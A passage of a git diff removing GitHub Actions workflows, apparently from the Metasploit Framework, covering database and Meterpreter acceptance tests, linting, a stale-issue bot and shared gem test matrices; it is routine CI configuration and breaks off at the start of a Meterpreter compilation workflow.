-        # Additionally - flakey tests should be fixed or marked as flakey instead of silently retried
-        run: |
-          bundle exec rspec spec/acceptance/ldap_spec.rb
-
-      - name: Archive results
-        if: always()
-        uses: actions/upload-artifact@v4
-        with:
-          # Provide a unique artifact for each matrix os, otherwise race conditions can lead to corrupt zips
-          name: ldap-acceptance-${{ matrix.os }}
-          path: tmp/allure-raw-data
-
-  # Generate a final report from the previous test results
-  report:
-    name: Generate report
-    needs:
-      - ldap
-    runs-on: ubuntu-latest
-    if: always()
-
-    steps:
-      - name: Checkout code
-        uses: actions/checkout@v4
-        if: always()
-
-      - name: Install system dependencies (Linux)
-        if: always()
-        run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz
-
-      # https://github.com/orgs/community/discussions/26952
-      - name: Support longpaths
-        if: runner.os == 'Windows'
-        run: git config --system core.longpaths true
-
-      - name: Setup Ruby
-        if: always()
-        env:
-          BUNDLE_FORCE_RUBY_PLATFORM: true
-        uses: ruby/setup-ruby@v1
-        with:
-          ruby-version: '${{ matrix.ruby }}'
-          bundler-cache: true
-          cache-version: 4
-
-      - uses: actions/download-artifact@v4
-        id: download
-        if: always()
-        with:
-          # Note: Not specifying a name will download all artifacts from the previous workflow jobs
-          path: raw-data
-
-      - name: allure generate
-        if: always()
-        run: |
-          export VERSION=2.22.1
-
-          curl -o allure-$VERSION.tgz -Ls https://github.com/allure-framework/allure2/releases/download/$VERSION/allure-$VERSION.tgz
-          tar -zxvf allure-$VERSION.tgz -C .
-
-          ls -la ${{steps.download.outputs.download-path}}
-          ./allure-$VERSION/bin/allure generate ${{steps.download.outputs.download-path}}/* -o ./allure-report
-
-          find ${{steps.download.outputs.download-path}}
-          bundle exec ruby tools/dev/report_generation/support_matrix/generate.rb --allure-data ${{steps.download.outputs.download-path}} > ./allure-report/support_matrix.html
-
-      - name: archive results
-        if: always()
-        uses: actions/upload-artifact@v4
-        with:
-          name: final-report-${{ github.run_id }}
-          path: |
-            ./allure-report
@@ -1,68 +0,0 @@
-name: Lint
-
-# https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#permissions
-permissions:
-  actions: none
-  checks: none
-  contents: none
-  deployments: none
-  id-token: none
-  issues: none
-  discussions: none
-  packages: none
-  pages: none
-  pull-requests: none
-  repository-projects: none
-  security-events: none
-  statuses: none
-
-on:
-  push:
-    branches-ignore:
-      - gh-pages
-      - metakitty
-      - weekly-dependency-updates
-  pull_request:
-    branches-ignore:
-      - weekly-dependency-updates
-
-jobs:
-  msftidy:
-    runs-on: ubuntu-latest
-    timeout-minutes: 60
-
-    env:
-      BUNDLE_WITHOUT: "coverage development pcap"
-
-    strategy:
-      fail-fast: true
-      matrix:
-        ruby:
-          - '3.2'
-
-    name: Lint msftidy
-    steps:
-      - name: Install system dependencies
-        run: sudo apt-get install libpcap-dev graphviz
-
-      - name: Checkout code
-        uses: actions/checkout@v4
-        # Required to checkout HEAD^ and 3a046f01dae340c124dd3895e670983aef5fe0c5 for the msftidy script
-        # https://github.com/actions/checkout/tree/5a4ac9002d0be2fb38bd78e4b4dbde5606d7042f#checkout-head
-        with:
-          fetch-depth: 0
-
-      - uses: ruby/setup-ruby@v1
-        with:
-          ruby-version: '${{ matrix.ruby }}'
-          bundler-cache: true
-
-      - name: Run msftidy
-        run: |
-          ln -sf ../../tools/dev/pre-commit-hook.rb ./.git/hooks/post-merge
-          ls -la ./.git/hooks
-          ./.git/hooks/post-merge
-
-      - name: Verify encoding
-        run: |
-          bundle exec ruby tools/dev/verify_encoding.rb
@@ -1,67 +0,0 @@
-name: Meterpreter Acceptance
-
-# Optional, enabling concurrency limits: https://docs.github.com/en/actions/using-jobs/using-concurrency
-#concurrency:
-#  group: ${{ github.ref }}-${{ github.workflow }}
-#  cancel-in-progress: ${{ github.ref != 'refs/heads/main' }}
-
-# https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#permissions
-permissions:
-  actions: none
-  checks: none
-  contents: none
-  deployments: none
-  id-token: none
-  issues: none
-  discussions: none
-  packages: none
-  pages: none
-  pull-requests: none
-  repository-projects: none
-  security-events: none
-  statuses: none
-
-on:
-  workflow_dispatch:
-    inputs:
-      metasploit_payloads_commit:
-        description: 'metasploit-payloads branch you want to test'
-        required: true
-        default: 'master'
-      mettle_commit:
-        description: 'mettle branch you want to test'
-        required: true
-        default: 'master'
-  push:
-    branches-ignore:
-      - gh-pages
-      - metakitty
-  pull_request:
-    branches:
-      - '*'
-    paths:
-      - 'metsploit-framework.gemspec'
-      - 'Gemfile.lock'
-      - 'data/templates/**'
-      - 'modules/payloads/**'
-      - 'lib/msf/base/sessions/**'
-      - 'lib/msf/core/payload/**'
-      - 'lib/msf/core/**'
-      - 'test/modules/**'
-      - 'tools/dev/**'
-      - 'spec/acceptance/**'
-      - 'spec/support/acceptance/**'
-      - 'spec/acceptance_spec_helper.rb'
-      - '.github/**'
-#   Example of running as a cron, to weed out flaky tests
-#  schedule:
-#    - cron: '*/15 * * * *'
-
-jobs:
-  build:
-    uses: ./.github/workflows/shared_meterpreter_acceptance.yml
-    with:
-      metasploit_payloads_commit: ${{ github.event.inputs.metasploit_payloads_commit }}
-      mettle_commit: ${{ github.event.inputs.mettle_commit }}
-      build_metasploit_payloads: ${{ contains(github.event.pull_request.labels.*.name, 'payload-testing-branch') }}
-      build_mettle: ${{ contains(github.event.pull_request.labels.*.name, 'payload-testing-mettle-branch') }}
@@ -1,184 +0,0 @@
-name: MSSQL Acceptance
-
-# Optional, enabling concurrency limits: https://docs.github.com/en/actions/using-jobs/using-concurrency
-#concurrency:
-#  group: ${{ github.ref }}-${{ github.workflow }}
-#  cancel-in-progress: ${{ github.ref != 'refs/heads/main' }}
-
-# https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#permissions
-permissions:
-  actions: none
-  checks: none
-  contents: none
-  deployments: none
-  id-token: none
-  issues: none
-  discussions: none
-  packages: none
-  pages: none
-  pull-requests: none
-  repository-projects: none
-  security-events: none
-  statuses: none
-
-on:
-  push:
-    branches-ignore:
-      - gh-pages
-      - metakitty
-  pull_request:
-    branches:
-      - '*'
-    paths:
-      - 'metsploit-framework.gemspec'
-      - 'Gemfile.lock'
-      - '**/**mssql**'
-      - 'spec/acceptance/**'
-      - 'spec/support/acceptance/**'
-      - 'spec/acceptance_spec_helper.rb'
-      - '.github/**'
-#   Example of running as a cron, to weed out flaky tests
-#  schedule:
-#    - cron: '*/15 * * * *'
-
-jobs:
-  mssql:
-    runs-on: ${{ matrix.os }}
-    timeout-minutes: 60
-
-    services:
-      mssql:
-        image: ${{ matrix.docker_image }}
-        ports: ["1433:1433"]
-        env:
-          MSSQL_SA_PASSWORD: yourStrong(!)Password
-          ACCEPT_EULA: 'Y'
-        options: >-
-          --health-cmd "/opt/mssql-tools18/bin/sqlcmd -U sa -P 'yourStrong(!)Password' -C -Q 'select 1' -b -o /dev/null"
-          --health-interval 10s
-          --health-timeout 5s
-          --health-retries 5
-    strategy:
-      fail-fast: true
-      matrix:
-        ruby:
-          - '3.2'
-        os:
-          - ubuntu-latest
-        docker_image:
-          - mcr.microsoft.com/mssql/server:2022-latest
-          - mcr.microsoft.com/mssql/server:2019-latest
-
-    env:
-      RAILS_ENV: test
-      BUNDLE_WITHOUT: "coverage development pcap"
-
-
-    name: ${{ matrix.docker_image }} - ${{ matrix.os }} - Ruby ${{ matrix.ruby }}
-    steps:
-      - name: Install system dependencies
-        run: sudo apt-get install -y --no-install-recommends libpcap-dev graphviz
-
-      - name: Checkout code
-        uses: actions/checkout@v4
-
-      # https://github.com/orgs/community/discussions/26952
-      - name: Support longpaths
-        if: runner.os == 'Windows'
-        run: git config --system core.longpaths true
-
-      - name: Setup Ruby
-        env:
-          # Nokogiri doesn't release pre-compiled binaries for preview versions of Ruby; So force compilation with BUNDLE_FORCE_RUBY_PLATFORM
-          BUNDLE_FORCE_RUBY_PLATFORM: "${{ contains(matrix.ruby, 'preview') && 'true' || 'false' }}"
-        uses: ruby/setup-ruby@v1
-        with:
-          ruby-version: '${{ matrix.ruby }}'
-          bundler-cache: true
-
-      - name: Extract runtime version
-        run: |
-          echo "RUNTIME_VERSION=$(echo $DOCKER_IMAGE | awk -F: '{ print $2 }')" >> $GITHUB_ENV
-          echo "DOCKER_IMAGE_FILENAME=$(echo $DOCKER_IMAGE | tr -d '/:')" >> $GITHUB_ENV
-        env:
-          DOCKER_IMAGE: ${{ matrix.docker_image }}
-          OS: ${{ matrix.os }}
-
-      - name: acceptance
-        env:
-          SPEC_HELPER_LOAD_METASPLOIT: false
-          SPEC_OPTS: "--tag acceptance --require acceptance_spec_helper.rb --color --format documentation --format AllureRspec::RSpecFormatter"
-          RUNTIME_VERSION: ${{ env.RUNTIME_VERSION }}
-        # Unix run command:
-        #   SPEC_HELPER_LOAD_METASPLOIT=false bundle exec ./spec/acceptance
-        # Windows cmd command:
-        #   set SPEC_HELPER_LOAD_METASPLOIT=false
-        #   bundle exec rspec .\spec\acceptance
-        # Note: rspec retry is intentionally not used, as it can cause issues with allure's reporting
-        # Additionally - flakey tests should be fixed or marked as flakey instead of silently retried
-        run: |
-          bundle exec rspec spec/acceptance/mssql_spec.rb
-      - name: Archive results
-        if: always()
-        uses: actions/upload-artifact@v4
-        with:
-          # Provide a unique artifact for each matrix os, otherwise race conditions can lead to corrupt zips
-          name: ${{ env.DOCKER_IMAGE_FILENAME }}-${{ matrix.os }}
-          path: tmp/allure-raw-data
-
-  # Generate a final report from the previous test results
-  report:
-    name: Generate report
-    needs:
-      - mssql
-    runs-on: ubuntu-latest
-    if: always()
-
-    steps:
-      - name: Checkout code
-        uses: actions/checkout@v4
-        if: always()
-
-      - name: Install system dependencies (Linux)
-        if: always()
-        run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz
-
-      # https://github.com/orgs/community/discussions/26952
-      - name: Support longpaths
-        if: runner.os == 'Windows'
-        run: git config --system core.longpaths true
-
-      - name: Setup Ruby
-        if: always()
-        env:
-          BUNDLE_FORCE_RUBY_PLATFORM: true
-        uses: ruby/setup-ruby@v1
-        with:
-          ruby-version: '${{ matrix.ruby }}'
-          bundler-cache: true
-          cache-version: 4
-
-      - uses: actions/download-artifact@v4
-        id: download
-        if: always()
-        with:
-          # Note: Not specifying a name will download all artifacts from the previous workflow jobs
-          path: raw-data
-
-      - name: allure generate
-        if: always()
-        run: |
-          export VERSION=2.22.1
-          curl -o allure-$VERSION.tgz -Ls https://github.com/allure-framework/allure2/releases/download/$VERSION/allure-$VERSION.tgz
-          tar -zxvf allure-$VERSION.tgz -C .
-          ls -la ${{steps.download.outputs.download-path}}
-          ./allure-$VERSION/bin/allure generate ${{steps.download.outputs.download-path}}/* -o ./allure-report
-          find ${{steps.download.outputs.download-path}}
-          bundle exec ruby tools/dev/report_generation/support_matrix/generate.rb --allure-data ${{steps.download.outputs.download-path}} > ./allure-report/support_matrix.html
-      - name: archive results
-        if: always()
-        uses: actions/upload-artifact@v4
-        with:
-          name: final-report-${{ github.run_id }}
-          path: |
-            ./allure-report
@@ -1,187 +0,0 @@
-name: MySQL Acceptance
-
-# Optional, enabling concurrency limits: https://docs.github.com/en/actions/using-jobs/using-concurrency
-#concurrency:
-#  group: ${{ github.ref }}-${{ github.workflow }}
-#  cancel-in-progress: ${{ github.ref != 'refs/heads/main' }}
-
-# https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#permissions
-permissions:
-  actions: none
-  checks: none
-  contents: none
-  deployments: none
-  id-token: none
-  issues: none
-  discussions: none
-  packages: none
-  pages: none
-  pull-requests: none
-  repository-projects: none
-  security-events: none
-  statuses: none
-
-on:
-  push:
-    branches-ignore:
-      - gh-pages
-      - metakitty
-  pull_request:
-    branches:
-      - '*'
-    paths:
-      - 'metsploit-framework.gemspec'
-      - 'Gemfile.lock'
-      - '**/**mysql**'
-      - 'spec/acceptance/**'
-      - 'spec/support/acceptance/**'
-      - 'spec/acceptance_spec_helper.rb'
-      - '.github/**'
-#   Example of running as a cron, to weed out flaky tests
-#  schedule:
-#    - cron: '*/15 * * * *'
-
-jobs:
-  mysql:
-    runs-on: ${{ matrix.os }}
-    timeout-minutes: 60
-
-    services:
-      mysql:
-        image: ${{ matrix.target.version }}
-        ports: ["3306:3306"]
-        env:
-          MYSQL_ROOT_PASSWORD: password
-        options: >-
-          --health-cmd "${{ matrix.target.health_cmd }}"
-          --health-interval 10s
-          --health-timeout 10s
-          --health-retries 5
-    strategy:
-      fail-fast: true
-      matrix:
-        ruby:
-          - '3.2'
-        os:
-          - ubuntu-latest
-        target:
-          - { version: "mariadb:latest", health_cmd: "mariadb -uroot -ppassword -e 'SELECT version()'" }
-          - { version: "mysql:latest", health_cmd: "mysql -uroot -ppassword -e 'SELECT version()'" }
-
-    env:
-      RAILS_ENV: test
-      BUNDLE_WITHOUT: "coverage development pcap"
-
-    name: ${{ matrix.target.version }} - ${{ matrix.os }} - Ruby ${{ matrix.ruby }}
-    steps:
-      - name: Install system dependencies
-        run: sudo apt-get install -y --no-install-recommends libpcap-dev graphviz
-
-      - name: Checkout code
-        uses: actions/checkout@v4
-
-      # https://github.com/orgs/community/discussions/26952
-      - name: Support longpaths
-        if: runner.os == 'Windows'
-        run: git config --system core.longpaths true
-
-      - name: Setup Ruby
-        env:
-          # Nokogiri doesn't release pre-compiled binaries for preview versions of Ruby; So force compilation with BUNDLE_FORCE_RUBY_PLATFORM
-          BUNDLE_FORCE_RUBY_PLATFORM: "${{ contains(matrix.ruby, 'preview') && 'true' || 'false' }}"
-        uses: ruby/setup-ruby@v1
-        with:
-          ruby-version: '${{ matrix.ruby }}'
-          bundler-cache: true
-
-      - name: Extract runtime version
-        run: |
-          echo "RUNTIME_VERSION=$(echo $DOCKER_IMAGE | awk -F: '{ print $2 }')" >> $GITHUB_ENV
-          echo "DOCKER_IMAGE_FILENAME=$(echo $DOCKER_IMAGE | tr -d ':')" >> $GITHUB_ENV
-        env:
-          DOCKER_IMAGE: ${{ matrix.target.version }}
-          OS: ${{ matrix.os }}
-
-      - name: acceptance
-        env:
-          SPEC_HELPER_LOAD_METASPLOIT: false
-          SPEC_OPTS: "--tag acceptance --require acceptance_spec_helper.rb --color --format documentation --format AllureRspec::RSpecFormatter"
-          RUNTIME_VERSION: ${{ env.RUNTIME_VERSION }}
-        # Unix run command:
-        #   SPEC_HELPER_LOAD_METASPLOIT=false bundle exec ./spec/acceptance
-        # Windows cmd command:
-        #   set SPEC_HELPER_LOAD_METASPLOIT=false
-        #   bundle exec rspec .\spec\acceptance
-        # Note: rspec retry is intentionally not used, as it can cause issues with allure's reporting
-        # Additionally - flakey tests should be fixed or marked as flakey instead of silently retried
-        run: |
-          bundle exec rspec spec/acceptance/mysql_spec.rb
-
-      - name: Archive results
-        if: always()
-        uses: actions/upload-artifact@v4
-        with:
-          # Provide a unique artifact for each matrix os, otherwise race conditions can lead to corrupt zips
-          name: ${{ env.DOCKER_IMAGE_FILENAME }}-${{ matrix.os }}
-          path: tmp/allure-raw-data
-
-  # Generate a final report from the previous test results
-  report:
-    name: Generate report
-    needs:
-      - mysql
-    runs-on: ubuntu-latest
-    if: always()
-
-    steps:
-      - name: Checkout code
-        uses: actions/checkout@v4
-        if: always()
-
-      - name: Install system dependencies (Linux)
-        if: always()
-        run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz
-
-      # https://github.com/orgs/community/discussions/26952
-      - name: Support longpaths
-        if: runner.os == 'Windows'
-        run: git config --system core.longpaths true
-
-      - name: Setup Ruby
-        if: always()
-        env:
-          BUNDLE_FORCE_RUBY_PLATFORM: true
-        uses: ruby/setup-ruby@v1
-        with:
-          ruby-version: '${{ matrix.ruby }}'
-          bundler-cache: true
-          cache-version: 4
-
-      - uses: actions/download-artifact@v4
-        id: download
-        if: always()
-        with:
-          # Note: Not specifying a name will download all artifacts from the previous workflow jobs
-          path: raw-data
-
-      - name: allure generate
-        if: always()
-        run: |
-          export VERSION=2.22.1
-
-          curl -o allure-$VERSION.tgz -Ls https://github.com/allure-framework/allure2/releases/download/$VERSION/allure-$VERSION.tgz
-          tar -zxvf allure-$VERSION.tgz -C .
-
-          ls -la ${{steps.download.outputs.download-path}}
-          ./allure-$VERSION/bin/allure generate ${{steps.download.outputs.download-path}}/* -o ./allure-report
-
-          find ${{steps.download.outputs.download-path}}
-          bundle exec ruby tools/dev/report_generation/support_matrix/generate.rb --allure-data ${{steps.download.outputs.download-path}} > ./allure-report/support_matrix.html
-
-      - name: archive results
-        if: always()
-        uses: actions/upload-artifact@v4
-        with:
-          name: final-report-${{ github.run_id }}
-          path: |
-            ./allure-report
@@ -1,191 +0,0 @@
-name: Postgres Acceptance
-
-# Optional, enabling concurrency limits: https://docs.github.com/en/actions/using-jobs/using-concurrency
-#concurrency:
-#  group: ${{ github.ref }}-${{ github.workflow }}
-#  cancel-in-progress: ${{ github.ref != 'refs/heads/main' }}
-
-# https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#permissions
-permissions:
-  actions: none
-  checks: none
-  contents: none
-  deployments: none
-  id-token: none
-  issues: none
-  discussions: none
-  packages: none
-  pages: none
-  pull-requests: none
-  repository-projects: none
-  security-events: none
-  statuses: none
-
-on:
-  push:
-    branches-ignore:
-      - gh-pages
-      - metakitty
-  pull_request:
-    branches:
-      - '*'
-    paths:
-      - 'metsploit-framework.gemspec'
-      - 'Gemfile.lock'
-      - '**/**postgres**'
-      - 'lib/metasploit/framework/tcp/**'
-      - 'lib/metasploit/framework/login_scanner/**'
-      - 'spec/acceptance/**'
-      - 'spec/support/acceptance/**'
-      - 'spec/acceptance_spec_helper.rb'
-      - '.github/**'
-#   Example of running as a cron, to weed out flaky tests
-#  schedule:
-#    - cron: '*/15 * * * *'
-
-jobs:
-  postgres:
-    runs-on: ${{ matrix.os }}
-    timeout-minutes: 60
-
-    services:
-      postgres:
-        image: ${{ matrix.docker_image }}
-        ports: ["5432:5432"]
-        env:
-          POSTGRES_USER: postgres
-          POSTGRES_PASSWORD: password
-        options: >-
-          --health-cmd "pg_isready --username postgres"
-          --health-interval 10s
-          --health-timeout 5s
-          --health-retries 5
-
-    strategy:
-      fail-fast: true
-      matrix:
-        ruby:
-          - '3.2'
-        os:
-          - ubuntu-latest
-        docker_image:
-          - postgres:9.4
-          - postgres:16.2
-
-    env:
-      RAILS_ENV: test
-      BUNDLE_WITHOUT: "coverage development pcap"
-
-    name: ${{ matrix.docker_image }} - ${{ matrix.os }} - Ruby ${{ matrix.ruby }}
-    steps:
-      - name: Install system dependencies
-        run: sudo apt-get install -y --no-install-recommends libpcap-dev graphviz
-
-      - name: Checkout code
-        uses: actions/checkout@v4
-
-      # https://github.com/orgs/community/discussions/26952
-      - name: Support longpaths
-        if: runner.os == 'Windows'
-        run: git config --system core.longpaths true
-
-      - name: Setup Ruby
-        env:
-          # Nokogiri doesn't release pre-compiled binaries for preview versions of Ruby; So force compilation with BUNDLE_FORCE_RUBY_PLATFORM
-          BUNDLE_FORCE_RUBY_PLATFORM: "${{ contains(matrix.ruby, 'preview') && 'true' || 'false' }}"
-        uses: ruby/setup-ruby@v1
-        with:
-          ruby-version: '${{ matrix.ruby }}'
-          bundler-cache: true
-
-      - name: Extract runtime version
-        run: |
-          echo "RUNTIME_VERSION=$(echo $DOCKER_IMAGE | awk -F: '{ print $2 }')" >> $GITHUB_ENV
-          echo "DOCKER_IMAGE_FILENAME=$(echo $DOCKER_IMAGE | tr -d ':')" >> $GITHUB_ENV
-        env:
-          DOCKER_IMAGE: ${{ matrix.docker_image }}
-          OS: ${{ matrix.os }}
-
-      - name: acceptance
-        env:
-          SPEC_HELPER_LOAD_METASPLOIT: false
-          SPEC_OPTS: "--tag acceptance --require acceptance_spec_helper.rb --color --format documentation --format AllureRspec::RSpecFormatter"
-          RUNTIME_VERSION: ${{ env.RUNTIME_VERSION }}
-        # Unix run command:
-        #   SPEC_HELPER_LOAD_METASPLOIT=false bundle exec ./spec/acceptance
-        # Windows cmd command:
-        #   set SPEC_HELPER_LOAD_METASPLOIT=false
-        #   bundle exec rspec .\spec\acceptance
-        # Note: rspec retry is intentionally not used, as it can cause issues with allure's reporting
-        # Additionally - flakey tests should be fixed or marked as flakey instead of silently retried
-        run: |
-          bundle exec rspec spec/acceptance/postgres_spec.rb
-
-      - name: Archive results
-        if: always()
-        uses: actions/upload-artifact@v4
-        with:
-          # Provide a unique artifact for each matrix os, otherwise race conditions can lead to corrupt zips
-          name: ${{ env.DOCKER_IMAGE_FILENAME }}-${{ matrix.os }}
-          path: tmp/allure-raw-data
-
-  # Generate a final report from the previous test results
-  report:
-    name: Generate report
-    needs:
-      - postgres
-    runs-on: ubuntu-latest
-    if: always()
-
-    steps:
-      - name: Checkout code
-        uses: actions/checkout@v4
-        if: always()
-
-      - name: Install system dependencies (Linux)
-        if: always()
-        run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz
-
-      # https://github.com/orgs/community/discussions/26952
-      - name: Support longpaths
-        if: runner.os == 'Windows'
-        run: git config --system core.longpaths true
-
-      - name: Setup Ruby
-        if: always()
-        env:
-          BUNDLE_FORCE_RUBY_PLATFORM: true
-        uses: ruby/setup-ruby@v1
-        with:
-          ruby-version: '${{ matrix.ruby }}'
-          bundler-cache: true
-          cache-version: 4
-
-      - uses: actions/download-artifact@v4
-        id: download
-        if: always()
-        with:
-          # Note: Not specifying a name will download all artifacts from the previous workflow jobs
-          path: raw-data
-
-      - name: allure generate
-        if: always()
-        run: |
-          export VERSION=2.22.1
-
-          curl -o allure-$VERSION.tgz -Ls https://github.com/allure-framework/allure2/releases/download/$VERSION/allure-$VERSION.tgz
-          tar -zxvf allure-$VERSION.tgz -C .
-
-          ls -la ${{steps.download.outputs.download-path}}
-          ./allure-$VERSION/bin/allure generate ${{steps.download.outputs.download-path}}/* -o ./allure-report
-
-          find ${{steps.download.outputs.download-path}}
-          bundle exec ruby tools/dev/report_generation/support_matrix/generate.rb --allure-data ${{steps.download.outputs.download-path}} > ./allure-report/support_matrix.html
-
-      - name: archive results
-        if: always()
-        uses: actions/upload-artifact@v4
-        with:
-          name: final-report-${{ github.run_id }}
-          path: |
-            ./allure-report
@@ -1,55 +0,0 @@
-# https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#permissions
-permissions:
-  actions: none
-  checks: none
-  contents: none
-  deployments: none
-  id-token: none
-  # This action can update/close issues
-  issues: write
-  discussions: none
-  packages: none
-  pages: none
-  pull-requests: none
-  repository-projects: none
-  security-events: none
-  statuses: none
-
-on:
-  schedule:
-    - cron: "0 15 * * 1-5"
-
-name: Stale Bot workflow
-
-jobs:
-  build:
-    name: stale
-    runs-on: ubuntu-latest
-    steps:
-      - name: stale
-        id: stale
-        uses: actions/stale@v3
-        with:
-          repo-token: ${{ secrets.GITHUB_TOKEN }}
-          days-before-stale: 30
-          days-before-close: 30
-          operations-per-run: 75
-          stale-issue-message: |
-            Hi!
-
-            This issue has been left open with no activity for a while now.
-
-            We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here.
-            If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!
-
-            As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.
-          close-issue-message: |
-            Hi again!
-
-            It’s been 60 days since anything happened on this issue, so we are going to close it.
-            Please keep in mind that I’m only a robot, so if I’ve closed this issue in error please feel free to reopen this issue or create a new one if you need anything else.
-
-            As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.
-          exempt-issue-labels: |
-            discussion,not-stale,confirmed,easy,newbie-friendly,suggestion,suggestion-module,suggestion-feature,suggestion-docs,ascii-utf8-issues,database,feature,enhancement,library
-          debug-only: false
@@ -1,69 +0,0 @@
-name: Shared Gem Verify
-on:
-  workflow_call:
-    inputs:
-      test_commands:
-        description: 'Test commands'
-        required: false
-        default: "bundle exec rspec"
-        type: string
-      dependencies:
-        description: 'Array of system dependencies to install'
-        required: false
-        default: "[]"
-        type: string
-
-jobs:
-  test:
-    runs-on: ${{ matrix.os }}
-    timeout-minutes: 40
-
-    strategy:
-      fail-fast: false
-      matrix:
-        ruby:
-          - '3.2'
-          - '3.3'
-          - '3.4'
-        os:
-          - ubuntu-22.04
-          - ubuntu-24.04
-          - ubuntu-latest
-          - windows-2022
-          - windows-2025
-          - macos-15-intel
-
-    env:
-      RAILS_ENV: test
-
-    name: ${{ matrix.os }} - Ruby ${{ matrix.ruby }}
-    steps:
-      - name: Install system dependencies
-        if: ${{ inputs.dependencies != '[]' && !contains(matrix.os, 'macos') && !contains(matrix.os, 'windows') }}
-        run: |
-          dependencies=$(echo '${{ inputs.dependencies }}' | jq -r '.[]')
-          for dep in $dependencies; do
-            sudo apt-get -y --no-install-recommends install "$dep"
-          done
-        shell: bash
-
-      - name: Install system dependencies (Windows)
-        if: ${{ contains(matrix.os, 'windows') && inputs.dependencies != '[]' }}
-        run: |
-          $dependencies = (echo '${{ inputs.dependencies }}' | jq -r '.[]')
-          foreach ($dep in $dependencies) {
-            choco install $dep -y
-          }
-        shell: pwsh
-
-      - name: Checkout code
-        uses: actions/checkout@v4
-
-      - name: Setup Ruby
-        uses: ruby/setup-ruby@v1
-        with:
-          ruby-version: ${{ matrix.ruby }}
-          bundler-cache: true
-
-      - name: Test
-        run: ${{ inputs.test_commands }}
@@ -1,116 +0,0 @@
-name: Shared Gem Verify Rails/PostgreSQL
-on:
-  workflow_call:
-    inputs:
-      test_commands:
-        description: 'Test commands'
-        required: false
-        default: "bundle exec rspec"
-        type: string
-      dependencies:
-        description: 'Array of system dependencies to install'
-        required: false
-        default: "[]"
-        type: string
-      additional_rails_versions:
-        description: 'Additional Rails version requirements as a JSON array (for example: ["~> 8.1.0"])'
-        required: false
-        default: "[]"
-        type: string
-        # Caller example:
-        # with:
-        #   additional_rails_versions: '["~> 8.1.0", "~> 8.2.0"]'
-
-jobs:
-  prepare_matrix:
-    runs-on: ubuntu-latest
-    outputs:
-      rails_versions: ${{ steps.merge_rails_versions.outputs.rails_versions }}
-    steps:
-      - name: Build Rails version matrix
-        id: merge_rails_versions
-        run: |
-          default_rails_versions='["~> 7.0.0","~> 7.1.0","~> 7.2.0"]'
-          additional_rails_versions='${{ inputs.additional_rails_versions }}'
-
-          rails_versions=$(jq -cn \
-            --argjson defaults "$default_rails_versions" \
-            --argjson extras "$additional_rails_versions" \
-            '$defaults + $extras | unique')
-
-          echo "rails_versions=$rails_versions" >> "$GITHUB_OUTPUT"
-        shell: bash
-
-  test:
-    needs: prepare_matrix
-    runs-on: ${{ matrix.os }}
-    timeout-minutes: 40
-
-    strategy:
-      fail-fast: false
-      matrix:
-        ruby:
-          - '3.2'
-          - '3.3'
-          - '3.4'
-        rails: ${{ fromJSON(needs.prepare_matrix.outputs.rails_versions) }}
-        postgres:
-          - '14.19'
-          - '16.8'
-        os:
-          - ubuntu-latest
-
-    env:
-      RAILS_ENV: test
-      RAILS_VERSION: ${{ matrix.rails }}
-
-    name: ${{ matrix.os }} - Ruby ${{ matrix.ruby }} - Rails ${{ matrix.rails }} - PostgreSQL ${{ matrix.postgres }}
-    steps:
-      - name: Install system dependencies
-        run: |
-          dependencies=$(echo '${{ inputs.dependencies }}' | jq -r '.[]')
-          for dep in $dependencies; do
-            sudo apt-get -y --no-install-recommends install "$dep"
-          done
-        shell: bash
-
-      - name: Set up PostgreSQL service
-        run: |
-          docker run --name postgres -d -p 5432:5432 \
-            -e POSTGRES_USER=postgres \
-            -e POSTGRES_PASSWORD=postgres \
-            --health-cmd="pg_isready" \
-            --health-interval="10s" \
-            --health-timeout="5s" \
-            --health-retries=5 \
-            postgres:${{ matrix.postgres }}
-
-      - name: Wait for PostgreSQL to be healthy
-        run: |
-          docker exec postgres sh -c 'until pg_isready -U postgres; do echo waiting for postgres; sleep 2; done; echo postgres is ready'
-
-      - name: Checkout code
-        uses: actions/checkout@v4
-
-      - name: Setup Ruby
-        uses: ruby/setup-ruby@v1
-        with:
-          ruby-version: ${{ matrix.ruby }}
-          bundler-cache: true
-
-      - name: Update Rails version
-        run: |
-          # Add the gem explicitly if it doesn't exist
-          if ! grep -q "gem ['\"]rails['\"]" Gemfile; then
-            echo 'gem "rails"' >> Gemfile          
-          fi
-          
-          # Ensure the gem is on the latest version
-          ruby -pi -e "gsub(/gem ['\"]rails['\"](, *['\"].*['\"])?/, \"gem 'rails', '${{ matrix.rails }}'\")" Gemfile
-          bundle update
-          bundle install
-          bundle show rails
-        shell: bash
-
-      - name: Test
-        run: ${{ inputs.test_commands }}
@@ -1,430 +0,0 @@
-name: Shared Meterpreter Acceptance
-on:
-  workflow_call:
-    inputs:
-      # Defaults set as '' will use the current branch as their commit
-      metasploit_framework_commit:
-        description: "metasploit-framework commit to build with"
-        default: ''
-        required: false
-        type: string
-      metasploit_payloads_commit:
-        description: "metasploit-payloads commit to build with"
-        default: ''
-        required: false
-        type: string
-      mettle_commit:
-        description: "mettle commit to build with"
-        default: ''
-        required: false
-        type: string
-      build_mettle:
-        description: "Whether or not to build mettle"
-        default: false
-        required: false
-        type: boolean
-      build_metasploit_payloads:
-        description: "Whether or not to build metasploit-payloads"
-        default: false
-        required: false
-        type: boolean
-
-jobs:
-  # Compile the Meterpreter payloads via docker if required, we can't always do this on the
-  # host environment (i.e. for macos). So it instead gets compiled first on a linux
-  # host, then the artifacts are copied back to the host later
-  meterpreter_compilation:
-    name: Compile Meterpreter
-    runs-on: ubuntu-latest
-    if: ${{ inputs.build_metasploit_payloads }}
-
-    steps:
-      - name: Checkout metasploit-payloads
-        uses: actions/checkout@v4
-        with:
-          repository: rapid7/metasploit-payloads
-          path: metasploit-payloads
-          ref: ${{ inputs.metasploit_payloads_commit }}
-
